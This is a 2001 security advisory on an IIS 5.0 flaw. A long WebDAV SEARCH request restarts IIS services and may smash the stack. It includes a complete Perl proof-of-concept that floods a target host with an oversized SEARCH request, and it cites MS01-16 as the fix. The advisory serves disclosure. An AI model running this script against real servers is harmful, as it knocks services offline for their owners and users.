COMMAND

    IIS

SYSTEMS AFFECTED

    IIS 5.0

PROBLEM

    Following is Georgi  Guninski security advisory  #39, 2001.   This
    may be a duplicate  of advisory #38 -  sorry if this is  the case.
    Microsoft did not answer questions  whether it is the same  issue.
    By sending valid  (not malformed) but  long SEARCH request  to IIS
    5.0 it is possible to restart all IIS related services.

    The interesting point is the stack seems to be smashed and  Georgi
    believes this may lead to executing arbitrary code though we  have
    not achieved it.  Details:

        #!/usr/bin/perl
        use IO::Socket;
        printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n";
        if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; }
        $port = @ARGV[1];
        $host = @ARGV[0];
        sub vv()
        {
        $ll=$_[0]; #length of buffer
        $ch=$_[1];
        $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
        $over=$ch x $ll; #string to overflow
        $xml='<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE("'.$over.'")</D:sql></D:searchrequest>'."\n";
        $l=length($xml);
        $req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
        syswrite($socket,$req,length($req));
        print ".";
        $socket->read($res,3000);
        print "r=".$res;
        close $socket;
        }
        do  vv(126000,"V");
        sleep(1);
        do  vv(126000,"V");
        #Try 125000 - 128000

SOLUTION

    Some of the revisions of MS01-16 solves this issue, yet we do  not
    recommend using IIS in production environment.